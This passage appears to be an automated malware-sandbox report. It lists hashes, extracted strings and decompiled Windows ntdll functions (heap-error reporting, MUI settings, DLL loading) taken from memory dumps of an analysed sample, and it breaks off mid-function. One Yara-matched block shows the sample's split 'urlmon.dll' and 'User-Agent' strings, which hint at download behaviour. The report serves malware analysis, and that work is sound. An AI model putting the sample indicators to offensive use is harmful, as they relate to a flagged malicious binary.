                                            • Opcode ID: 3eff6399784c95a37879c2e5df9049601b14c8bc323049bdb386d7b661a0e191
                                            • Instruction ID: 6b97c1c272066a10d9ae5db07586b327e2da51441593cc28def281dcf72283c0
                                            • Opcode Fuzzy Hash: 3eff6399784c95a37879c2e5df9049601b14c8bc323049bdb386d7b661a0e191
                                            • Instruction Fuzzy Hash: C9E0C2751197013BCB20EB648DC6EC77BA8DF05340F148D5FE8A99B243C138F64086A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: da91000bc847c2754bdb9f96ee4c25b57223099274395166b7c911a34fafda46
                                            • Instruction ID: 0bda0cf26f0e7f42fe81bc422289fa0214a8eaeb0ca1a60e88697ced3ceee5c6
                                            • Opcode Fuzzy Hash: da91000bc847c2754bdb9f96ee4c25b57223099274395166b7c911a34fafda46
                                            • Instruction Fuzzy Hash: 4AB09B719115C5CDEA11D7B4470871779047BD0745F16C055D2020645B4778C4D1F6B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Strings
                                            • <unknown>, xrefs: 012DB27E, 012DB2D1, 012DB350, 012DB399, 012DB417, 012DB48E
                                            • The critical section is owned by thread %p., xrefs: 012DB3B9
                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 012DB484
                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 012DB47D
                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 012DB352
                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012DB3D6
                                            • *** An Access Violation occurred in %ws:%s, xrefs: 012DB48F
                                            • The resource is owned exclusively by thread %p, xrefs: 012DB374
                                            • The instruction at %p tried to %s , xrefs: 012DB4B6
                                            • a NULL pointer, xrefs: 012DB4E0
                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 012DB476
                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 012DB323
                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 012DB314
                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 012DB39B
                                            • *** enter .cxr %p for the context, xrefs: 012DB50D
                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012DB38F
                                            • *** Inpage error in %ws:%s, xrefs: 012DB418
                                            • *** then kb to get the faulting stack, xrefs: 012DB51C
                                            • Go determine why that thread has not released the critical section., xrefs: 012DB3C5
                                            • read from, xrefs: 012DB4AD, 012DB4B2
                                            • This failed because of error %Ix., xrefs: 012DB446
                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 012DB2DC
                                            • The resource is owned shared by %d threads, xrefs: 012DB37E
                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 012DB305
                                            • write to, xrefs: 012DB4A6
                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 012DB2F3
                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 012DB53F
                                            • an invalid address, %p, xrefs: 012DB4CF
                                            • *** enter .exr %p for the exception record, xrefs: 012DB4F1
                                            • The instruction at %p referenced memory at %p., xrefs: 012DB432
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                            • API String ID: 0-108210295
                                            • Opcode ID: 1d972320fa90aaa86c48d43992565fd6257d3bbe1ee92b346cc45724dae72d31
                                            • Instruction ID: 890b2c190f4b17648c8d512978edc3be7f3731b10dbf49465b3b59f3ec587207
                                            • Opcode Fuzzy Hash: 1d972320fa90aaa86c48d43992565fd6257d3bbe1ee92b346cc45724dae72d31
                                            • Instruction Fuzzy Hash: B3811435A30211FFDB26DF4ACCAADBB3B65EF67B91F420048F6041B116D2A68501D7B2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 44%
                                            			E012E1C06() {
                                            				signed int _t27;
                                            				char* _t104;
                                            				char* _t105;
                                            				intOrPtr _t113;
                                            				intOrPtr _t115;
                                            				intOrPtr _t117;
                                            				intOrPtr _t119;
                                            				intOrPtr _t120;
                                            
                                            				_t105 = 0x12048a4;
                                            				_t104 = "HEAP: ";
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            					_push(_t104);
                                            					E0122B150();
                                            				} else {
                                            					E0122B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				_push( *0x131589c);
                                            				E0122B150("Heap error detected at %p (heap handle %p)\n",  *0x13158a0);
                                            				_t27 =  *0x1315898; // 0x0
                                            				if(_t27 <= 0xf) {
                                            					switch( *((intOrPtr*)(_t27 * 4 +  &M012E1E96))) {
                                            						case 0:
                                            							_t105 = "heap_failure_internal";
                                            							goto L21;
                                            						case 1:
                                            							goto L21;
                                            						case 2:
                                            							goto L21;
                                            						case 3:
                                            							goto L21;
                                            						case 4:
                                            							goto L21;
                                            						case 5:
                                            							goto L21;
                                            						case 6:
                                            							goto L21;
                                            						case 7:
                                            							goto L21;
                                            						case 8:
                                            							goto L21;
                                            						case 9:
                                            							goto L21;
                                            						case 0xa:
                                            							goto L21;
                                            						case 0xb:
                                            							goto L21;
                                            						case 0xc:
                                            							goto L21;
                                            						case 0xd:
                                            							goto L21;
                                            						case 0xe:
                                            							goto L21;
                                            						case 0xf:
                                            							goto L21;
                                            					}
                                            				}
                                            				L21:
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            					_push(_t104);
                                            					E0122B150();
                                            				} else {
                                            					E0122B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				_push(_t105);
                                            				E0122B150("Error code: %d - %s\n",  *0x1315898);
                                            				_t113 =  *0x13158a4; // 0x0
                                            				if(_t113 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0122B150();
                                            					} else {
                                            						E0122B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E0122B150("Parameter1: %p\n",  *0x13158a4);
                                            				}
                                            				_t115 =  *0x13158a8; // 0x0
                                            				if(_t115 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0122B150();
                                            					} else {
                                            						E0122B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E0122B150("Parameter2: %p\n",  *0x13158a8);
                                            				}
                                            				_t117 =  *0x13158ac; // 0x0
                                            				if(_t117 != 0) {
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0122B150();
                                            					} else {
                                            						E0122B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					E0122B150("Parameter3: %p\n",  *0x13158ac);
                                            				}
                                            				_t119 =  *0x13158b0; // 0x0
                                            				if(_t119 != 0) {
                                            					L41:
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            						_push(_t104);
                                            						E0122B150();
                                            					} else {
                                            						E0122B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            					}
                                            					_push( *0x13158b4);
                                            					E0122B150("Last known valid blocks: before - %p, after - %p\n",  *0x13158b0);
                                            				} else {
                                            					_t120 =  *0x13158b4; // 0x0
                                            					if(_t120 != 0) {
                                            						goto L41;
                                            					}
                                            				}
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                            					_push(_t104);
                                            					E0122B150();
                                            				} else {
                                            					E0122B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                            				}
                                            				return E0122B150("Stack trace available at %p\n", 0x13158c0);
                                            			}












                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                            • API String ID: 0-2897834094
                                            • Opcode ID: 68c970387123ca09abac3602eedd1bc620e60c202b21f7b3a30156a666f1f118
                                            • Instruction ID: b642228d5f0d5a90ced1ad6341ce5983419c39aa87b7e63550df8c0d41803a0e
                                            • Opcode Fuzzy Hash: 68c970387123ca09abac3602eedd1bc620e60c202b21f7b3a30156a666f1f118
                                            • Instruction Fuzzy Hash: 6761E933631155EFD312EB89D88DE3477E4EB15A30B9A807EFD099B345D6749CA08B0A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: Us$: $er-A$gent$ll$on.d$urlm$urlmon.dll
                                            • API String ID: 0-586467556
                                            • Opcode ID: 40e026cd32226a9130025487f97dbf8064262f73dee17c37a06b87673894670c
                                            • Instruction ID: d5422d959feb4dac0243d8b577787a05296b07f91b311dbb86e173e3e73025a5
                                            • Opcode Fuzzy Hash: 40e026cd32226a9130025487f97dbf8064262f73dee17c37a06b87673894670c
                                            • Instruction Fuzzy Hash: 8931EF32D045189ADB01EF65D8427FEFB78EF86324F204247D854AB102D7398E52C7EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 96%
                                            			E01233D34(signed int* __ecx) {
                                            				signed int* _v8;
                                            				char _v12;
                                            				signed int* _v16;
                                            				signed int* _v20;
                                            				char _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				char _v36;
                                            				signed int _v40;
                                            				signed int _v44;
                                            				signed int* _v48;
                                            				signed int* _v52;
                                            				signed int _v56;
                                            				signed int _v60;
                                            				char _v68;
                                            				signed int _t140;
                                            				signed int _t161;
                                            				signed int* _t236;
                                            				signed int* _t242;
                                            				signed int* _t243;
                                            				signed int* _t244;
                                            				signed int* _t245;
                                            				signed int _t255;
                                            				void* _t257;
                                            				signed int _t260;
                                            				void* _t262;
                                            				signed int _t264;
                                            				void* _t267;
                                            				signed int _t275;
                                            				signed int* _t276;
                                            				short* _t277;
                                            				signed int* _t278;
                                            				signed int* _t279;
                                            				signed int* _t280;
                                            				short* _t281;
                                            				signed int* _t282;
                                            				short* _t283;
                                            				signed int* _t284;
                                            				void* _t285;
                                            
                                            				_v60 = _v60 | 0xffffffff;
                                            				_t280 = 0;
                                            				_t242 = __ecx;
                                            				_v52 = __ecx;
                                            				_v8 = 0;
                                            				_v20 = 0;
                                            				_v40 = 0;
                                            				_v28 = 0;
                                            				_v32 = 0;
                                            				_v44 = 0;
                                            				_v56 = 0;
                                            				_t275 = 0;
                                            				_v16 = 0;
                                            				if(__ecx == 0) {
                                            					_t280 = 0xc000000d;
                                            					_t140 = 0;
                                            					L50:
                                            					 *_t242 =  *_t242 | 0x00000800;
                                            					_t242[0x13] = _t140;
                                            					_t242[0x16] = _v40;
                                            					_t242[0x18] = _v28;
                                            					_t242[0x14] = _v32;
                                            					_t242[0x17] = _t275;
                                            					_t242[0x15] = _v44;
                                            					_t242[0x11] = _v56;
                                            					_t242[0x12] = _v60;
                                            					return _t280;
                                            				}
                                            				if(E01231B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                            					_v56 = 1;
                                            					if(_v8 != 0) {
                                            						L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                            					}
                                            					_v8 = _t280;
                                            				}
                                            				if(E01231B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                            					_v60 =  *_v8;
                                            					L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                            					_v8 = _t280;
                                            				}
                                            				if(E01231B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                            					L16:
                                            					if(E01231B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                            						L28:
                                            						if(E01231B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                            							L46:
                                            							_t275 = _v16;
                                            							L47:
                                            							_t161 = 0;
                                            							L48:
                                            							if(_v8 != 0) {
                                            								L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                            							}
                                            							_t140 = _v20;
                                            							if(_t140 != 0) {
                                            								if(_t275 != 0) {
                                            									L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                            									_t275 = 0;
                                            									_v28 = 0;
                                            									_t140 = _v20;
                                            								}
                                            							}
                                            							goto L50;
                                            						}
                                            						_t167 = _v12;
                                            						_t255 = _v12 + 4;
                                            						_v44 = _t255;
                                            						if(_t255 == 0) {
                                            							_t276 = _t280;
                                            							_v32 = _t280;
                                            						} else {
                                            							_t276 = L01244620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                            							_t167 = _v12;
                                            							_v32 = _t276;
                                            						}
                                            						if(_t276 == 0) {
                                            							_v44 = _t280;
                                            							_t280 = 0xc0000017;
                                            							goto L46;
                                            						} else {
                                            							E0126F3E0(_t276, _v8, _t167);
                                            							_v48 = _t276;
                                            							_t277 = E01271370(_t276, 0x1204e90);
                                            							_pop(_t257);
                                            							if(_t277 == 0) {
                                            								L38:
                                            								_t170 = _v48;
                                            								if( *_v48 != 0) {
                                            									E0126BB40(0,  &_v68, _t170);
                                            									if(L012343C0( &_v68,  &_v24) != 0) {
                                            										_t280 =  &(_t280[0]);
                                            									}
                                            								}
                                            								if(_t280 == 0) {
                                            									_t280 = 0;
                                            									L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                            									_v44 = 0;
                                            									_v32 = 0;
                                            								} else {
                                            									_t280 = 0;
                                            								}
                                            								_t174 = _v8;
                                            								if(_v8 != 0) {
                                            									L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                            								}
                                            								_v8 = _t280;
                                            								goto L46;
                                            							}
                                            							_t243 = _v48;
                                            							do {
                                            								 *_t277 = 0;
                                            								_t278 = _t277 + 2;
                                            								E0126BB40(_t257,  &_v68, _t243);
                                            								if(L012343C0( &_v68,  &_v24) != 0) {
                                            									_t280 =  &(_t280[0]);
                                            								}
                                            								_t243 = _t278;
                                            								_t277 = E01271370(_t278, 0x1204e90);
                                            								_pop(_t257);
                                            							} while (_t277 != 0);
                                            							_v48 = _t243;
                                            							_t242 = _v52;
                                            							goto L38;
                                            						}
                                            					}
                                            					_t191 = _v12;
                                            					_t260 = _v12 + 4;
                                            					_v28 = _t260;
                                            					if(_t260 == 0) {
                                            						_t275 = _t280;
                                            						_v16 = _t280;
                                            					} else {
                                            						_t275 = L01244620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                            						_t191 = _v12;
                                            						_v16 = _t275;
                                            					}
                                            					if(_t275 == 0) {
                                            						_v28 = _t280;
                                            						_t280 = 0xc0000017;
                                            						goto L47;
                                            					} else {
                                            						E0126F3E0(_t275, _v8, _t191);
                                            						_t285 = _t285 + 0xc;
                                            						_v48 = _t275;
                                            						_t279 = _t280;
                                            						_t281 = E01271370(_v16, 0x1204e90);
                                            						_pop(_t262);
                                            						if(_t281 != 0) {
                                            							_t244 = _v48;
                                            							do {
                                            								 *_t281 = 0;
                                            								_t282 = _t281 + 2;
                                            								E0126BB40(_t262,  &_v68, _t244);
                                            								if(L012343C0( &_v68,  &_v24) != 0) {
                                            									_t279 =  &(_t279[0]);
                                            								}
                                            								_t244 = _t282;
                                            								_t281 = E01271370(_t282, 0x1204e90);
                                            								_pop(_t262);
                                            							} while (_t281 != 0);
                                            							_v48 = _t244;
                                            							_t242 = _v52;
                                            						}
                                            						_t201 = _v48;
                                            						_t280 = 0;
                                            						if( *_v48 != 0) {
                                            							E0126BB40(_t262,  &_v68, _t201);
                                            							if(L012343C0( &_v68,  &_v24) != 0) {
                                            								_t279 =  &(_t279[0]);
                                            							}
                                            						}
                                            						if(_t279 == 0) {
                                            							L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                            							_v28 = _t280;
                                            							_v16 = _t280;
                                            						}
                                            						_t202 = _v8;
                                            						if(_v8 != 0) {
                                            							L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                            						}
                                            						_v8 = _t280;
                                            						goto L28;
                                            					}
                                            				}
                                            				_t214 = _v12;
                                            				_t264 = _v12 + 4;
                                            				_v40 = _t264;
                                            				if(_t264 == 0) {
                                            					_v20 = _t280;
                                            				} else {
                                            					_t236 = L01244620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                            					_t280 = _t236;
                                            					_v20 = _t236;
                                            					_t214 = _v12;
                                            				}
                                            				if(_t280 == 0) {
                                            					_t161 = 0;
                                            					_t280 = 0xc0000017;
                                            					_v40 = 0;
                                            					goto L48;
                                            				} else {
                                            					E0126F3E0(_t280, _v8, _t214);
                                            					_t285 = _t285 + 0xc;
                                            					_v48 = _t280;
                                            					_t283 = E01271370(_t280, 0x1204e90);
                                            					_pop(_t267);
                                            					if(_t283 != 0) {
                                            						_t245 = _v48;
                                            						do {
                                            							 *_t283 = 0;
                                            							_t284 = _t283 + 2;
                                            							E0126BB40(_t267,  &_v68, _t245);
                                            							if(L012343C0( &_v68,  &_v24) != 0) {
                                            								_t275 = _t275 + 1;
                                            							}
                                            							_t245 = _t284;
                                            							_t283 = E01271370(_t284, 0x1204e90);
                                            							_pop(_t267);
                                            						} while (_t283 != 0);
                                            						_v48 = _t245;
                                            						_t242 = _v52;
                                            					}
                                            					_t224 = _v48;
                                            					_t280 = 0;
                                            					if( *_v48 != 0) {
                                            						E0126BB40(_t267,  &_v68, _t224);
                                            						if(L012343C0( &_v68,  &_v24) != 0) {
                                            							_t275 = _t275 + 1;
                                            						}
                                            					}
                                            					if(_t275 == 0) {
                                            						L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                            						_v40 = _t280;
                                            						_v20 = _t280;
                                            					}
                                            					_t225 = _v8;
                                            					if(_v8 != 0) {
                                            						L012477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                            					}
                                            					_v8 = _t280;
                                            					goto L16;
                                            				}
                                            			}

                                            Strings
                                            • Kernel-MUI-Language-SKU, xrefs: 01233F70
                                            • Kernel-MUI-Number-Allowed, xrefs: 01233D8C
                                            • WindowsExcludedProcs, xrefs: 01233D6F
                                            • Kernel-MUI-Language-Allowed, xrefs: 01233DC0
                                            • Kernel-MUI-Language-Disallowed, xrefs: 01233E97
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                            • API String ID: 0-258546922
                                            • Opcode ID: 7967c4363bc69cccf21656c822b311badc547788df1d3f2b6d3f0f20944a5bbb
                                            • Instruction ID: b9c9232cf04b4d92ba7dbfd2a1d53f3f1036cd37bbc899b52d187f7c26366758
                                            • Opcode Fuzzy Hash: 7967c4363bc69cccf21656c822b311badc547788df1d3f2b6d3f0f20944a5bbb
                                            • Instruction Fuzzy Hash: 70F194B2D2125AEFCB15EF98C980DEEBBB9FF58650F14015AE605E7250E7749E00CB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 44%
                                            			E01258E00(void* __ecx) {
                                            				signed int _v8;
                                            				char _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr* _t32;
                                            				intOrPtr _t35;
                                            				intOrPtr _t43;
                                            				void* _t46;
                                            				intOrPtr _t47;
                                            				void* _t48;
                                            				signed int _t49;
                                            				void* _t50;
                                            				intOrPtr* _t51;
                                            				signed int _t52;
                                            				void* _t53;
                                            				intOrPtr _t55;
                                            
                                            				_v8 =  *0x131d360 ^ _t52;
                                            				_t49 = 0;
                                            				_t48 = __ecx;
                                            				_t55 =  *0x1318464; // 0x73b80110
                                            				if(_t55 == 0) {
                                            					L9:
                                            					if( !_t49 >= 0) {
                                            						if(( *0x1315780 & 0x00000003) != 0) {
                                            							E012A5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                            						}
                                            						if(( *0x1315780 & 0x00000010) != 0) {
                                            							asm("int3");
                                            						}
                                            					}
                                            					return E0126B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                            				}
                                            				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                            				_t43 =  *0x1317984; // 0xdc2b20
                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                            					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                            					if(_t48 == _t43) {
                                            						_t50 = 0x5c;
                                            						if( *_t32 == _t50) {
                                            							_t46 = 0x3f;
                                            							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                            								_t32 = _t32 + 8;
                                            							}
                                            						}
                                            					}
                                            					_t51 =  *0x1318464; // 0x73b80110
                                            					 *0x131b1e0(_t47, _t32,  &_v12);
                                            					_t49 =  *_t51();
                                            					if(_t49 >= 0) {
                                            						L8:
                                            						_t35 = _v12;
                                            						if(_t35 != 0) {
                                            							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                            								E01259B10( *((intOrPtr*)(_t48 + 0x48)));
                                            								_t35 = _v12;
                                            							}
                                            							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                            						}
                                            						goto L9;
                                            					}
                                            					if(_t49 != 0xc000008a) {
                                            						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                            							if(_t49 != 0xc00000bb) {
                                            								goto L8;
                                            							}
                                            						}
                                            					}
                                            					if(( *0x1315780 & 0x00000005) != 0) {
                                            						_push(_t49);
                                            						E012A5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                            						_t53 = _t53 + 0x1c;
                                            					}
                                            					_t49 = 0;
                                            					goto L8;
                                            				} else {
                                            					goto L9;
                                            				}
                                            			}





















                                            Strings
                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0129932A
                                            • LdrpFindDllActivationContext, xrefs: 01299331, 0129935D
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 0129933B, 01299367
                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 01299357
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 0-3779518884
                                            • Opcode ID: e51d5f414a3b041fe5c397d98593205f9a3aecc3a4aa4470b5729ba120afe998
                                            • Instruction ID: aaf43cc682242a95e3367a16ebf2611fde7db8c1ec70d526e7598cf02673a379
                                            • Opcode Fuzzy Hash: e51d5f414a3b041fe5c397d98593205f9a3aecc3a4aa4470b5729ba120afe998
                                            • Instruction Fuzzy Hash: 1A412831A303129FEFB2AB0E98C9A35B6B5AB05314F064569FF0497092E7F05DC09381
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 83%
                                            			E01238794(void* __ecx) {
                                            				signed int _v0;
                                            				char _v8;
                                            				signed int _v12;
                                            				void* _v16;
                                            				signed int _v20;
                                            				intOrPtr _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				signed int _v40;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				void* __ebp;
                                            				intOrPtr* _t77;
                                            				signed int _t80;
                                            				signed char _t81;
                                            				signed int _t87;
                                            				signed int _t91;
                                            				void* _t92;
                                            				void* _t94;
                                            				signed int _t95;
                                            				signed int _t103;
                                            				signed int _t105;
                                            				signed int _t110;
                                            				signed int _t118;
                                            				intOrPtr* _t121;
                                            				intOrPtr _t122;
                                            				signed int _t125;
                                            				signed int _t129;
                                            				signed int _t131;
                                            				signed int _t134;
                                            				signed int _t136;
                                            				signed int _t143;
                                            				signed int* _t147;
                                            				signed int _t151;
                                            				void* _t153;
                                            				signed int* _t157;
                                            				signed int _t159;
                                            				signed int _t161;
                                            				signed int _t166;
                                            				signed int _t168;
                                            
                                            				_push(__ecx);
                                            				_t153 = __ecx;
                                            				_t159 = 0;
                                            				_t121 = __ecx + 0x3c;
                                            				if( *_t121 == 0) {
                                            					L2:
                                            					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                            					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                            						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                            						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                            						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                            							L6:
                                            							if(E0123934A() != 0) {
                                            								_t159 = E012AA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                            								__eflags = _t159;
                                            								if(_t159 < 0) {
                                            									_t81 =  *0x1315780; // 0x0
                                            									__eflags = _t81 & 0x00000003;
                                            									if((_t81 & 0x00000003) != 0) {
                                            										_push(_t159);
                                            										E012A5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                            										_t81 =  *0x1315780; // 0x0
                                            									}
                                            									__eflags = _t81 & 0x00000010;
                                            									if((_t81 & 0x00000010) != 0) {
                                            										asm("int3");
                                            									}
                                            								}
                                            							}
                                            						} else {
                                            							_t159 = E0123849B(0, _t122, _t153, _t159, _t180);
                                            							if(_t159 >= 0) {
                                            								goto L6;
                                            							}
                                            						}
                                            						_t80 = _t159;
                                            						goto L8;
                                            					} else {
                                            						_t125 = 0x13;
                                            						asm("int 0x29");
                                            						_push(0);
                                            						_push(_t159);
                                            						_t161 = _t125;
                                            						_t87 =  *( *[fs:0x30] + 0x1e8);
                                            						_t143 = 0;
                                            						_v40 = _t161;
                                            						_t118 = 0;
                                            						_push(_t153);
                                            						__eflags = _t87;
